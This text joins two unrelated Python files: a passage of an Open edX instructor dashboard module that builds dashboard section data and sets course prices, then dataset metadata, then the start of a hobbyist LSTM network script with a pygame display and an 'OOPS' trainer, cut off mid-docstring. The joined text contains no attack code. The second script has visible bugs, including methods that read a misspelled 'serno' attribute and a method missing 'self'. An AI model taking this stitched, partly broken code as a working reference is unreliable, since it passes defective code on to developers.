'get_sale_order_records_url': reverse('get_sale_order_records', kwargs={'course_id': unicode(course_key)}),
'instructor_url': reverse('instructor_dashboard', kwargs={'course_id': unicode(course_key)}),
'get_registration_code_csv_url': reverse('get_registration_codes', kwargs={'course_id': unicode(course_key)}),
'generate_registration_code_csv_url': reverse('generate_registration_codes', kwargs={'course_id': unicode(course_key)}),
'active_registration_code_csv_url': reverse('active_registration_codes', kwargs={'course_id': unicode(course_key)}),
'spent_registration_code_csv_url': reverse('spent_registration_codes', kwargs={'course_id': unicode(course_key)}),
'set_course_mode_url': reverse('set_course_mode_price', kwargs={'course_id': unicode(course_key)}),
'download_coupon_codes_url': reverse('get_coupon_codes', kwargs={'course_id': unicode(course_key)}),
'enrollment_report_url': reverse('get_enrollment_report', kwargs={'course_id': unicode(course_key)}),
'exec_summary_report_url': reverse('get_exec_summary_report', kwargs={'course_id': unicode(course_key)}),
'list_financial_report_downloads_url': reverse('list_financial_report_downloads',
kwargs={'course_id': unicode(course_key)}),
'list_instructor_tasks_url': reverse('list_instructor_tasks', kwargs={'course_id': unicode(course_key)}),
'look_up_registration_code': reverse('look_up_registration_code', kwargs={'course_id': unicode(course_key)}),
'coupons': coupons,
'sales_admin': access['sales_admin'],
'coupons_enabled': coupons_enabled,
'reports_enabled': reports_enabled,
'course_price': course_price,
'total_amount': total_amount,
'is_ecommerce_course': is_ecommerce_course(course_key)
}
return section_data
def _section_special_exams(course, access):
""" Provide data for the corresponding dashboard section """
course_key = course.id
section_data = {
'section_key': 'special_exams',
'section_display_name': _('Special Exams'),
'access': access,
'course_id': unicode(course_key)
}
return section_data
def _section_certificates(course):
"""Section information for the certificates panel.
The certificates panel allows global staff to generate
example certificates and enable self-generated certificates
for a course.
Arguments:
course (Course)
Returns:
dict
"""
example_cert_status = None
html_cert_enabled = certs_api.has_html_certificates_enabled(course)
if html_cert_enabled:
can_enable_for_course = True
else:
example_cert_status = certs_api.example_certificates_status(course.id)
# Allow the user to enable self-generated certificates for students
# *only* once a set of example certificates has been successfully generated.
# If certificates have been misconfigured for the course (for example, if
# the PDF template hasn't been uploaded yet), then we don't want
# to turn on self-generated certificates for students!
can_enable_for_course = (
example_cert_status is not None and
all(
cert_status['status'] == 'success'
for cert_status in example_cert_status
)
)
instructor_generation_enabled = settings.FEATURES.get('CERTIFICATES_INSTRUCTOR_GENERATION', False)
certificate_statuses_with_count = {
certificate['status']: certificate['count']
for certificate in GeneratedCertificate.get_unique_statuses(course_key=course.id)
}
return {
'section_key': 'certificates',
'section_display_name': _('Certificates'),
'example_certificate_status': example_cert_status,
'can_enable_for_course': can_enable_for_course,
'enabled_for_course': certs_api.cert_generation_enabled(course.id),
'is_self_paced': course.self_paced,
'instructor_generation_enabled': instructor_generation_enabled,
'html_cert_enabled': html_cert_enabled,
'active_certificate': certs_api.get_active_web_certificate(course),
'certificate_statuses_with_count': certificate_statuses_with_count,
'status': CertificateStatuses,
'certificate_generation_history':
CertificateGenerationHistory.objects.filter(course_id=course.id).order_by("-created"),
'urls': {
'generate_example_certificates': reverse(
'generate_example_certificates',
kwargs={'course_id': course.id}
),
'enable_certificate_generation': reverse(
'enable_certificate_generation',
kwargs={'course_id': course.id}
),
'start_certificate_generation': reverse(
'start_certificate_generation',
kwargs={'course_id': course.id}
),
'start_certificate_regeneration': reverse(
'start_certificate_regeneration',
kwargs={'course_id': course.id}
),
'list_instructor_tasks_url': reverse(
'list_instructor_tasks',
kwargs={'course_id': course.id}
),
}
}
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_POST
@login_required
def set_course_mode_price(request, course_id):
"""
set the new course price and add new entry in the CourseModesArchive Table
"""
try:
course_price = int(request.POST['course_price'])
except ValueError:
return JsonResponse(
{'message': _("Please Enter the numeric value for the course price")},
status=400) # status code 400: Bad Request
currency = request.POST['currency']
course_key = CourseKey.from_string(course_id)
course_honor_mode = CourseMode.objects.filter(mode_slug='honor', course_id=course_key)
if not course_honor_mode:
return JsonResponse(
{'message': _("CourseMode with the mode slug({mode_slug}) DoesNotExist").format(mode_slug='honor')},
status=400) # status code 400: Bad Request
CourseModesArchive.objects.create(
course_id=course_id, mode_slug='honor', mode_display_name='Honor Code Certificate',
min_price=course_honor_mode[0].min_price, currency=course_honor_mode[0].currency,
expiration_datetime=datetime.datetime.now(pytz.utc), expiration_date=datetime.date.today()
)
course_honor_mode.update(
min_price=course_price,
currency=currency
)
return JsonResponse({'message': _("CourseMode price updated successfully")})
def _section_course_info(course, access):
""" Provide data for the corresponding dashboard section """
course_key = course.id
section_data = {
'section_key': 'course_info',
'section_display_name': _('Course Info'),
'access': access,
'course_org': course.display_org_with_default,
'course_number': course.display_number_with_default,
'course_name': course.display_name,
'course_display_name': course.display_name_with_default,
'has_started': course.has_started(),
'has_ended': course.has_ended(),
'start_date': course.start,
'end_date': course.end,
'num_sections': len(course.children),
'list_instructor_tasks_url': reverse('list_instructor_tasks', kwargs={'course_id': unicode(course_key)}),
}
if settings.FEATURES.get('DISPLAY_ANALYTICS_ENROLLMENTS'):
section_data['enrollment_count'] = CourseEnrollment.objects.enrollment_counts(course_key)
if show_analytics_dashboard_message(course_key):
# dashboard_link is already made safe in _get_dashboard_link
dashboard_link = _get_dashboard_link(course_key)
# so we can use Text() here so it's not double-escaped and rendering HTML on the front-end
message = Text(_("Enrollment data is now available in {dashboard_link}.")).format(dashboard_link=dashboard_link)
section_data['enrollment_message'] = message
if settings.FEATURES.get('ENABLE_SYSADMIN_DASHBOARD'):
section_data['detailed_gitlogs_url'] = reverse('gitlogs_detail', kwargs={'course_id': unicode(course_key)})
try:
sorted_cutoffs = sorted(course.grade_cutoffs.items(), key=lambda i: i[1], reverse=True)
advance = lambda memo, (letter, score): "{}: {}, ".format(letter, score) + memo
section_data['grade_cutoffs'] = reduce(advance, sorted_cutoffs, "")[:-2]
except Exception: # pylint: disable=broad-except
section_data['grade_cutoffs'] = "Not Available"
try:
section_data['course_errors'] = [(escape(a), '') for (a, _unused) in modulestore().get_course_errors(course.id)]
except Exception: # pylint: disable=broad-except
section_data['course_errors'] = [('Error fetching errors', '')]
return section_data
def _section_membership(course, access, is_white_label):
""" Provide data for the corresponding dashboard section """
course_key = course.id
ccx_enabled = settings.FEATURES.get('CUSTOM_COURSES_EDX', False) and course.enable_ccx
section_data = {
'section_key': 'membership',
'section_display_name': _('Membership'),
'access': access,
'ccx_is_enabled': ccx_enabled,
'is_white_label': is_white_label,
'enroll_button_url': reverse('students_update_enrollment', kwargs={'course_id': unicode(course_key)}),
'unenroll_button_url': reverse('students_update_enrollment', kwargs={'course_id': unicode(course_key)}),
'upload_student_csv_button_url': reverse('register_and_enroll_students', kwargs={'course_id': unicode(course_key)}),
'modify_beta_testers_button_url': reverse('bulk_beta_modify_access', kwargs={'course_id': unicode(course_key)}),
'list_course_role_members_url': reverse('list_course_role_members', kwargs={'course_id': unicode(course_key)}),
'modify_access_url': reverse('modify_access', kwargs={'course_id': unicode(course_key)}),
'list_forum_members_url': reverse('list_forum_members', kwargs={'course_id': unicode(course_key)}),
'update_forum_role_membership_url': reverse('update_forum_role_membership', kwargs={'course_id': unicode(course_key)}),
}
return section_data
def _section_cohort_management(course, access):
""" Provide data for the corresponding cohort management section """
course_key = course.id
ccx_enabled = hasattr(course_key, 'ccx')
section_data = {
'section_key': 'cohort_management',
'section_display_name': _('Cohorts'),
'access': access,
'ccx_is_enabled': ccx_enabled,
'course_cohort_settings_url': reverse(
'course_cohort_settings',
kwargs={'course_key_string': unicode(course_key)}
),
'cohorts_url': reverse('cohorts', kwargs={'course_key_string': unicode(course_key)}),
'upload_cohorts_csv_url': reverse('add_users_to_cohorts', kwargs={'course_id': unicode(course_key)}),
'verified_track_cohorting_url': reverse(
'verified_track_cohorting', kwargs={'course_key_string': unicode(course_key)}
),
}
return section_data
def _section_discussions_management(course, access):
""" Provide data for the corresponding discussion management section """
course_key = course.id
enrollment_track_schemes = available_division_schemes(course_key)
section_data = {
'section_key': 'discussions_management',
'section_display_name': _('Discussions'),
'is_hidden': (not is_course_cohorted(course_key) and
CourseDiscussionSettings.ENROLLMENT_TRACK not in enrollment_track_schemes),
'discussion_topics_url': reverse('discussion_topics', kwargs={'course_key_string': unicode(course_key)}),
'course_discussion_settings': reverse(
'course_discussions_settings',
kwargs={'course_key_string': unicode(course_key)}
),
}
return section_data
def _is_small_course(course_key):
""" Compares against MAX_ENROLLMENT_INSTR_BUTTONS to determine if course enrollment is considered small. """
is_small_course = False
enrollment_count = CourseEnrollment.objects.num_enrolled_in(course_key)
max_enrollment_for_buttons = settings.FEATURES.get("MAX_ENROLLMENT_INSTR_BUTTONS")
if max_enrollment_for_buttons is not None:
is_small_course = enrollment_count <= max_enrollment_for_buttons
return is_small_course
def _section_student_admin(course, access):
""" Provide data for the corresponding dashboard section """
course_key = course.id
is_small_course = _is_small_course(course_key)
section_data = {
'section_key': 'student_admin',
'section_display_name': _('Student Admin'),
'access': access,
'is_small_course': is_small_course,
'get_student_progress_url_url': reverse('get_student_progress_url', kwargs={'course_id': unicode(course_key)}),
'enrollment_url': reverse('students_update_enrollment', kwargs={'course_id': unicode(course_key)}),
'reset_student_attempts_url': reverse('reset_student_attempts', kwargs={'course_id': unicode(course_key)}),
'reset_student_attempts_for_entrance_exam_url': reverse(
'reset_student_attempts_for_entrance_exam',
kwargs={'course_id': unicode(course_key)},
),
'rescore_problem_url': reverse('rescore_problem', kwargs={'course_id': unicode(course_key)}),
'override_problem_score_url': reverse('override_problem_score', kwargs={'course_id': unicode(course_key)}),
'rescore_entrance_exam_url': reverse('rescore_entrance_exam', kwargs={'course_id': unicode(course_key)}),
'student_can_skip_entrance_exam_url': reverse(
'mark_student_can_skip_entrance_exam',
kwargs={'course_id': unicode(course_key)},
),
'list_instructor_tasks_url': reverse('list_instructor_tasks', kwargs={'course_id': unicode(course_key)}),
'list_entrace_exam_instructor_tasks_url': reverse('list_entrance_exam_instructor_tasks',
kwargs={'course_id': unicode(course_key)}),
'spoc_gradebook_url': reverse('spoc_gradebook', kwargs={'course_id': unicode(course_key)}),
}
return section_data
def _section_extensions(course):
""" Provide data for the corresponding dashboard section """
section_data = {
'section_key': 'extensions',
'section_display_name': _('Extensions'),
'units_with_due_dates': [(title_or_url(unit), unicode(unit.location))
for unit in get_units_with_due_date(course)],
'change_due_date_url': reverse('change_due_date', kwargs={'course_id': unicode(course.id)}),
'reset_due_date_url': reverse('reset_due_date', kwargs={'course_id': unicode(course.id)}),
'show_unit_extensions_url': reverse('show_unit_extensions', kwargs={'course_id': unicode(course.id)}),
'show_student_extensions_url': reverse('show_student_extensions', kwargs={'course_id': unicode(course.id)}),
}
return section_data
def _section_data_download(course, access):
""" Provide data for the corresponding dashboard section """
course_key = course.id
show_proctored_report_button = (
settings.FEATURES.get('ENABLE_SPECIAL_EXAMS', False) and
course.enable_proctored_exams
)
section_data = {
'section_key': 'data_download',
'section_display_name': _('Data Download'),
'access': access,
'show_generate_proctored_exam_report_button': show_proctored_report_button,
'get_problem_responses_url': reverse('get_problem_responses', kwargs={'course_id': unicode(course_key)}),
'get_grading_config_url': reverse('get_grading_config', kwargs={'course_id': unicode(course_key)}),
'get_students_features_url': reverse('get_students_features', kwargs={'course_id': unicode(course_key)}),
'get_issued_certificates_url': reverse(
'get_issued_certificates', kwargs={'course_id': unicode(course_key)}
),
'get_students_who_may_enroll_url': reverse(
'get_students_who_may_enroll', kwargs={'course_id': unicode(course_key)}
),
'get_students_certificates_status_url': reverse(
'get_students_certificates_status', kwargs={'course_id': unicode(course_key)}
),
'get_anon_ids_url': reverse('get_anon_ids', kwargs={'course_id': unicode(course_key)}),
'list_proctored_results_url': reverse('get_proctored_exam_results', kwargs={'course_id': unicode(course_key)}),
'list_instructor_tasks_url': reverse('list_instructor_tasks', kwargs={'course_id': unicode(course_key)}),
'list_report_downloads_url': reverse('list_report_downloads', kwargs={'course_id': unicode(course_key)}),
'calculate_grades_csv_url': reverse('calculate_grades_csv', kwargs={'course_id': unicode(course_key)}),
'problem_grade_report_url': reverse('problem_grade_report', kwargs={'course_id': unicode(course_key)}),
'course_has_survey': True if course.course_survey_name else False,
'course_survey_results_url': reverse('get_course_survey_results', kwargs={'course_id': unicode(course_key)}),
'export_ora2_data_url': reverse('export_ora2_data', kwargs={'course_id': unicode(course_key)}),
}
return section_data
def null_applicable_aside_types(block): # pylint: disable=unused-argument
"""
get_aside method for monkey-patching into applicable_aside_types
while rendering an HtmlDescriptor for email text editing. This returns
an empty list.
"""
return []
def _section_send_email(course, access):
""" Provide data for the corresponding bulk email section """
course_key = course.id
# Monkey-patch applicable_aside_types to return no asides for the duration of this render
with patch.object(course.runtime, 'applicable_aside_types', null_applicable_aside_types):
# This HtmlDescriptor is only being used to generate a nice text editor.
html_module = HtmlDescriptor(
course.system,
DictFieldData({'data': ''}),
ScopeIds(None, None, None, course_key.make_usage_key('html', 'fake'))
)
fragment = course.system.render(html_module, 'studio_view')
fragment = wrap_xblock(
'LmsRuntime', html_module, 'studio_view', fragment, None,
extra_data={"course-id": unicode(course_key)},
usage_id_serializer=lambda usage_id: quote_slashes(unicode(usage_id)),
# Generate a new request_token here at random, because this module isn't connected to any other
# xblock rendering.
request_token=uuid.uuid1().get_hex()
)
cohorts = []
if is_course_cohorted(course_key):
cohorts = get_course_cohorts(course)
course_modes = []
if not VerifiedTrackCohortedCourse.is_verified_track_cohort_enabled(course_key):
course_modes = CourseMode.modes_for_course(course_key, include_expired=True, only_selectable=False)
email_editor = fragment.content
section_data = {
'section_key': 'send_email',
'section_display_name': _('Email'),
'access': access,
'send_email': reverse('send_email', kwargs={'course_id': unicode(course_key)}),
'editor': email_editor,
'cohorts': cohorts,
'course_modes': course_modes,
'default_cohort_name': DEFAULT_COHORT_NAME,
'list_instructor_tasks_url': reverse(
'list_instructor_tasks', kwargs={'course_id': unicode(course_key)}
),
'email_background_tasks_url': reverse(
'list_background_email_tasks', kwargs={'course_id': unicode(course_key)}
),
'email_content_history_url': reverse(
'list_email_content', kwargs={'course_id': unicode(course_key)}
),
}
return section_data
def _get_dashboard_link(course_key):
""" Construct a URL to the external analytics dashboard """
analytics_dashboard_url = '{0}/courses/{1}'.format(settings.ANALYTICS_DASHBOARD_URL, unicode(course_key))
link = HTML(u"<a href=\"{0}\" target=\"_blank\">{1}</a>").format(
analytics_dashboard_url, settings.ANALYTICS_DASHBOARD_NAME
)
return link
def _section_analytics(course, access):
""" Provide data for the corresponding dashboard section """
section_data = {
'section_key': 'instructor_analytics',
'section_display_name': _('Analytics'),
'access': access,
'course_id': unicode(course.id),
}
return section_data
def _section_metrics(course, access):
"""Provide data for the corresponding dashboard section """
course_key = course.id
section_data = {
'section_key': 'metrics',
'section_display_name': _('Metrics'),
'access': access,
'course_id': unicode(course_key),
'sub_section_display_name': get_section_display_name(course_key),
'section_has_problem': get_array_section_has_problem(course_key),
'get_students_opened_subsection_url': reverse('get_students_opened_subsection'),
'get_students_problem_grades_url': reverse('get_students_problem_grades'),
'post_metrics_data_csv_url': reverse('post_metrics_data_csv'),
}
return section_data
def _section_open_response_assessment(request, course, openassessment_blocks, access):
"""Provide data for the corresponding dashboard section """
course_key = course.id
ora_items = []
parents = {}
for block in openassessment_blocks:
block_parent_id = unicode(block.parent)
result_item_id = unicode(block.location)
if block_parent_id not in parents:
parents[block_parent_id] = modulestore().get_item(block.parent)
ora_items.append({
'id': result_item_id,
'name': block.display_name,
'parent_id': block_parent_id,
'parent_name': parents[block_parent_id].display_name,
'staff_assessment': 'staff-assessment' in block.assessment_steps,
'url_base': reverse('xblock_view', args=[course.id, block.location, 'student_view']),
'url_grade_available_responses': reverse('xblock_view', args=[course.id, block.location,
'grade_available_responses_view']),
})
openassessment_block = openassessment_blocks[0]
block, __ = get_module_by_usage_id(
request, unicode(course_key), unicode(openassessment_block.location),
disable_staff_debug_info=True, course=course
)
section_data = {
'fragment': block.render('ora_blocks_listing_view', context={
'ora_items': ora_items,
'ora_item_view_enabled': settings.FEATURES.get('ENABLE_XBLOCK_VIEW_ENDPOINT', False)
}),
'section_key': 'open_response_assessment',
'section_display_name': _('Open Responses'),
'access': access,
'course_id': unicode(course_key),
}
return section_data
def _section_recap(request, course, recap_blocks, access):
"""Provide data for the Recap dashboard section """
course_key = course.id
recap_block = recap_blocks[0]
block, __ = get_module_by_usage_id(
request, unicode(course_key), unicode(recap_block.location),
disable_staff_debug_info=True, course=course
)
# Set up recap instructor dashboard fragment, pass data to the context
fragment = block.render('recap_blocks_listing_view', context={})
# Wrap the fragment and get all resources associated with this XBlock view
fragment = wrap_xblock(
'LmsRuntime', recap_block, 'recap_blocks_listing_view', fragment, None,
extra_data={"course-id": unicode(course_key)},
usage_id_serializer=lambda usage_id: quote_slashes(unicode(usage_id)),
# Generate a new request_token here at random, because this module isn't connected to any other
# xblock rendering.
request_token=uuid.uuid1().get_hex()
)
section_data = {
'fragment': fragment,
'section_key': 'recap',
'section_display_name': _('Recap'),
'access': access,
'course_id': unicode(course_key)
}
return section_data
def is_ecommerce_course(course_key):
"""
Checks if the given course is an e-commerce course or not, by checking its SKU value from
CourseMode records for the course
"""
sku_count = len([mode.sku for mode in CourseMode.modes_for_course(course_key) if mode.sku])
return sku_count > 0
|
proversity-org/edx-platform
|
lms/djangoapps/instructor/views/instructor_dashboard.py
|
Python
|
agpl-3.0
| 38,981
|
[
"VisIt"
] |
ec57c02a441cbc24befb06042a5ee0de472d6c1ab4cf77219db9b28ff92e9930
|
#! /usr/bin/python
"""
Python LSTM (Long short term memory)
with OOPS training (Optimal Ordering Problem Solver)
implementation.
OOPS is an alternative training method that avoids some
of the drawbacks in back-propogation (ie: local minima)
training. An OOPS trainer also allows both supervised
(training examples) and unsupervised (reinforcement learning)
training.
Copyright (C) 2013 Christopher BRIAN Jack (gau_veldt@hotmail.com)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import pygame,os
pygame.init()
size=(640,320)
visual=pygame.display.set_mode(size,pygame.DOUBLEBUF)
elapsed=0
since=pygame.time.get_ticks()
framerate=1000.0/60.0
font=pygame.font.SysFont("courier",18)
textregion=pygame.Rect(0,230,640,30)
import math
import random
import sys
import pprint
from functools import partial
NDEBUG=False
EntropySource=random.SystemRandom()
Formatter=pprint.PrettyPrinter(indent=2)
def blackhole(*args,**kwargs):
pass
if NDEBUG:
debug=blackhole
else:
debug=print
def log(self,msg,which='testLog'):
target=self.logs[which]
target.append(msg)
target=target[-100:]
def last(self,which='testLog'):
try:
return self.logs[which][-1]
except:
pass
_serNo=0
def serNo():
global _serNo
_serNo+=1
return _serNo
log.logs={}
log.logs['testLog']=[]
log.logs['solveLog']=[]
log.last=partial(last,log)
log.log=partial(log,log)
halfPi=math.pi/2.0
twoPi=math.pi*2.0
def sigmoid(x):
"""
Sigmoid function
"""
rc=1/(1+math.exp(-x))
return rc
def dtSigmoid(x):
"""
rate of change of sigmoid at x
(derivative)
"""
sx=sigmoid(x)
return sx*(1-sx)
def bin2gray(b):
return b[:1]+''.join([str(int(i) ^ int(ishift)) for i, ishift in zip(b[:-1],b[1:])])
def searchCurve(a):
if a<halfPi:
return 1.0-math.sin(a)
else:
return -1.0-math.sin(a)
class TopologyError(Exception):
""" When something goes wrong in topology """
def __init__(self,val):
self.value=val
def __str__(self):
return self.value
class Terminal:
def __init__(self,*args,**kwargs):
self.value=0.0
self.serNo=serNo()
def write(self,val,**kwargs):
self.value=val
def read(self,**kwargs):
return self.value
def __eq__(self,other):
return hash(self)==hash(other)
def __hash__(self):
return self.serNo
def __lt__(self,other):
return self.serNo<other.serNo
class Input(Terminal):
def __init__(self,*args,**kwargs):
super(Input,self).__init__(*args,**kwargs)
def __str__(self):
return "ITERM+%s=%s" % (self.serno,self.value)
class Output(Terminal):
count=0
def __init__(self,*args,**kwargs):
super(Output,self).__init__(*args,**kwargs)
def __str__(self):
return "OTERM%s=%s" % (self.serno,self.value)
class Topology:
"""
Maintains ANN/RNN network topology
Manages node-to-node connections,
connection weights and activation traversal.
Connections may contain cycles (recurrent network).
When an input changes network will reflect it
immediately. The nodes will be activated in
hop count order recursively so long as it has
not already activated on this input's time step.
This allows local adaptation to any asymmetry of
indvidual input's information flow and timing of
individual input change.
Nodes must provide methods AvailableConnectionPoints(),
Activate() and read("connName").
AvailableConnectionPoints():
returns a dictionary of connection types:
{ "connName" : connType, ...}
connType is one of:
0: input - connName is a sink
1: output - connName is a source
Activate() will be called to run node cycle
read("connName")
- reads value connName
"""
def __init__(self,*args,**kwargs):
self.connections={}
self.nodeRefs={}
self.outRefs={}
self.SquishOutput=True
def enableOutputLogistic(enable=True):
"""
Enables or disables logistical
squishing of output terminal values
"""
self.SquishOutput=enable
def makeOrdered(self):
ordered=[]
visited={C:False for C in self.connections}
# dry run activation pass (no states are harmed)
# to yield connections in order they
# will be accessed but we want
# the first connection access to
# be at the end of the list
for n in self.nodeRefs:
# the nodes we want are all the ones connected
# to any input channels (we rely on the node
# object to order this list so the non-depending
# inputs come first). for instance an LSTM node
# lists outputgate after forgetgate since outputgate
# may source the peephole which depends on forgetgate
# (this is a special dependency specific to the LSTM
# node's implementation of peepholes to allow output
# gates to react to a *change* in CEC state)
for ch in n.availableConnectionPoints(InputOnly=True):
sources=self.getSources(n,ch)
for s in sources:
if not visited[s]:
ordered=[s]+ordered
visited[s]=True
for n in self.outRefs:
# now the output edges
sources=self.getSources(n,Output)
for s in sources:
if not visited[s]:
ordered=[s]+ordered
visited[s]=True
self.ordered=ordered
def Connect(self,source,sink):
"""
Connects specified connection points
source: 2-tuple or list of 2-tuples or None
signal source (from an output port)
When source is None creates an input terminal
sink: 2-tuple or list of 2-tuples or None
signal destination (to an input port)
When sink is None creates an output terminal
Each specified source will be connected all specified sinks
Input or output terminal creation returns an appropriate object
Duplicated connection edges are silently filtered
"""
if source is None and sink is None:
# I/O terminal pair with no intervening nodes is likely a user error
raise TopologyError("Attempt to create I/O terminal pair that bypasses nodes.")
# Create input or output terminal
newbie=None
if source is None:
newbie=Input()
source=(newbie,Input)
if sink is None:
newbie=Output()
sink=(newbie,Output)
# make sure Inputs and Outputs aren't incorrectly placed
if type(source[0])==Output:
raise TopologyError("Output terminals as sources not permitted.")
if type(sink[0])==Input:
raise TopologyError("Input terminals as sinks not permitted.")
# normalize when terminals provided
if type(sink[0])==Output:
# the sneaky caller didn't use auto-create for
# output terminals but we still need outRefs to them
self.outRefs[sink[0]]=1
# normalize output terminal's channel designation
sink=(sink[0],Output)
if type(source[0])==Input:
# normalize input terminal's channel designation
source=(source[0],Input)
# make single tuples lists of tuples
if not isinstance(source,list):
origPoints=[source]
else:
origPoints=source
if not isinstance(sink,list):
destPoints=[sink]
else:
destPoints=sink
# validate connection specs
origCount=len(origPoints)
idx=0
for CP in origPoints+destPoints:
# origPoints want an output channel
isSource=1
if idx>=origCount:
# destPoints want an input channel
isSource=0
try:
cpNode,cpChan=CP
except TypeError:
raise TopologyError("Connect: %s not of form (x,y) or [x,y]" % CP)
if not cpChan in [Input,Output]:
try:
aCPs=cpNode.availableConnectionPoints()
except AttributeError:
raise TopologyError("Connect: %s: %s is not a valid node" % (CP,cpNode))
if cpChan not in aCPs.keys():
raise TopologyError("Connect: node %s: no such port %s" % (cpNode,cpChan))
if aCPs[cpChan]!=isSource:
raise TopologyError("Connect: connection %s is not an %s" % (\
CP, ['input','output'][isSource]))
else:
if cpChan==Input and not isSource==1:
raise TopologyError("Connect: illegal incoming connection to input terminal")
if cpChan==Output and isSource==1:
raise TopologyError("Connect: illegal outgoing connection from output terminal")
idx=idx+1
# make connections
for orig in origPoints:
for dest in destPoints:
# store connection
C=(orig,dest)
self.connections[C]=1.0
# memoize nodes involved with connection
# to improve performance of Activate()
if orig[1]!=Input:
self.nodeRefs[orig[0]]=True
if dest[1]!=Output:
self.nodeRefs[dest[0]]=True
# indicate network is unsorted
self.ordered=None
# returns the input or output terminal if one was created
# otherwise None
return newbie
def getTargets(self,source,channel):
"""
Get list of connection destinations for the specified source
"""
found=[]
for (src,srcChan),(dest,destChan) in self.connections:
if src==source and srcChan==channel:
found.append((dest,destChan))
return found
def getInputs(self,sink,channel):
"""
Gets list of all weighted values feeding to the specified sink
"""
found=[]
for (src,srcChan),(dest,destChan) in self.connections:
if dest==sink and destChan==channel:
w=self.connections[((src,srcChan),(dest,destChan))]
value=w*src.read(channel=srcChan)
found.append(value)
return found
def getSources(self,sink,channel):
"""
Gets list of all connections feeding specified sink
"""
found=[]
for (src,srcChan),(dest,destChan) in self.connections:
if dest==sink and destChan==channel:
found.append(((src,srcChan),(dest,destChan)))
return found
def Activate(self):
"""
Activates network nodes
Input and Output terminals are not passes in themselves but
nodes with sinks connected to Input terminals will receive
the values of the corresponding terminals. The output
levels are sampled (ie: the Output nodes written with
values) after all nodes activate.
"""
if self.ordered is None:
self.makeOrdered()
# activate each node
for n in self.nodeRefs:
n.Activate(self)
# node activations are done now activate each output
for o in self.outRefs:
sigma=sum(self.getInputs(o,Output))
if self.SquishOutput:
o.write(sigmoid(sigma))
else:
o.write(sigma)
class NodeError(Exception):
""" when something goes wrong in a node """
def __init__(self,val):
self.value=val
def __str__(self):
return self.value
class LSTM_Node:
"""
Long Short Term Memory node
The above extra gates could be useful in some topologies to enable
localized problem space searching within the netowrk itself.
has inputs:
input - input
inputGate - input attenuator
forgetGate - internal state attenuator
outputGate - output attenuator
has outputs:
output - node's output
peephole - node's internal state
optional:
output activation function
"""
iConns=["input","inputGate","forgetGate","outputGate"]
oConns=["peephole","output"]
connMap={
k:v for (k,v) in \
[(x,0) for x in iConns] + \
[(x,1) for x in oConns]
}
def __init__(self,*args,**kwargs):
""" sets up node """
self.CEC=0.0
self.serNo=serNo()
self.states={k:v for (k,v) in [(x,0.0) for x in LSTM_Node.oConns]}
for chan in LSTM_Node.iConns:
self.states[chan]={
"value":None,
}
def __lt__(self,n):
return self.serNo<n.serNo
def __str__(self):
info="{'CEC':%s,'peephole':%s,'output':%s,'inputs':%s}" % (\
self.CEC,self.states['peephole'],\
self.states['output'],\
{ k:self.states[k] for k in LSTM_Node.iConns})
return Formatter.pformat(eval(info))
def availableConnectionPoints(self,**kwargs):
""" enumerate connection points """
if "InputOnly" in kwargs:
return LSTM_Node.iConns
if "OutputOnly" in kwargs:
return LSTM_Node.oConns
return LSTM_Node.connMap
def read(self,**kwargs):
"""
Query a channel's value
"""
if "channel" in kwargs:
ch=kwargs["channel"]
if ch in LSTM_Node.connMap.keys():
if ch in LSTM_Node.oConns:
return self.states[ch]
else:
return self.states[ch]['value']
else:
raise NodeError("LSTM_Node: no such channel '%s'" % ch)
else:
raise NodeError("LSTM_Node: read() must specify a channel")
def Activate(self,net):
"""
perform activation pass
"""
# activate input and scale to [-2,2]
self.states['input']['value']=4.0*sigmoid(sum(net.getInputs(self,'input')))-2.0
# activate inputGate
self.states['inputGate']['value']=sigmoid(sum(net.getInputs(self,'inputGate')))
# compute gated input
gatedInput=self.states['input']['value']*self.states['inputGate']['value']
# apply input to internal state
self.CEC=self.CEC+gatedInput
# activate forget gate
self.states['forgetGate']['value']=sigmoid(sum(net.getInputs(self,'forgetGate')))
# gate internal state (applies forgetfulness)
self.CEC=self.CEC*self.states['forgetGate']['value']
# squish the ungated output (peephole)
self.states['peephole']=sigmoid(self.CEC)
# activate output gate
# NB: This is done after squished peephole value is known
# so that the fresh CEC state is visible to the output gate
self.states['outputGate']['value']=sigmoid(sum(net.getInputs(self,'outputGate')))
# gate (already squished) output
self.states['output']=self.states['peephole']*self.states['outputGate']['value']
class OOPS:
"""
OOPS - Optimal Ordered Problem Solver
A little about OOPS and how it is being implemented:
A true OOPS is more complicated and I've simplified it
to work in constant storage with fixed search cycles.
Some of the theoretical aspects like changing the search
algorithm are not imeplemented. A general OOPS blows up
in storage requirement due to the need to store *all*
prior solutions. I am using a fixed solution store
ordered by increasing error (or decreasing fitness).
OOPS basically solves a sequence problems and may use
previous solutions as the basis to solve future problems.
For this trainer case the goal (problem) is defined as:
Yielding a weight vector that reduces training error
(supervised) or increases fitness score (unsupervised).
So any vector of weights that achieves the goal is a solution
to the problem. The problem is defined incrementally to make
the implementation on-line friendly.
Once a solution is found OOPS algorithm is to add the solution
to a holding space for solution examples then present the solution.
The implementation of presenting the solution is to apply the
weights of the solution vector to the current Topology.
OOPS would then solve the next problem. Here we obtain a new
problem from the incremental definition by rememebring the gain
made by the solution (reduced error or gained reward). This
effectively yields the next problem with "the bar slightly raised"
whose goal is a further reduction of error or gain of reward. By
repeating the cycle over many epochs it becomes possible to train
the network to a desired behavior.
When a new network is created it has no previous solutions on record.
Furthermore OOPS specifies that timeslices should both look through
solutions on record AND explore the problem space for novel solutions.
I implement this search by copying a weight vector then applying
a random number of randomly chosen evolution operators (radical,
sign-invert, splice, swap and transpose):
radical: some weight in the vector is replaced by a whole new
randomly chosen value.
sign-invert: one weight in the vector's sign is inverted.
splice: 50% of the vector is randomly overwritten with the
contents of a weighted random selection of a previous
solution's vector. The weighting curve (1.0-cos(x),
0.0<=x<=Pi/2.0) favors elements at the top of the list
since they are the highest fitness. Splice will not
be chosen when there is only one solution in the solution
store (first solution is initialized to the initial
network when trainer is created).
swap: swap some weight in the vector with some other weight.
transpose: one weight in the vector is swapped with a neighbour.
-- Backtracking --
Since LSTM is recurrent and has states that change over time (the
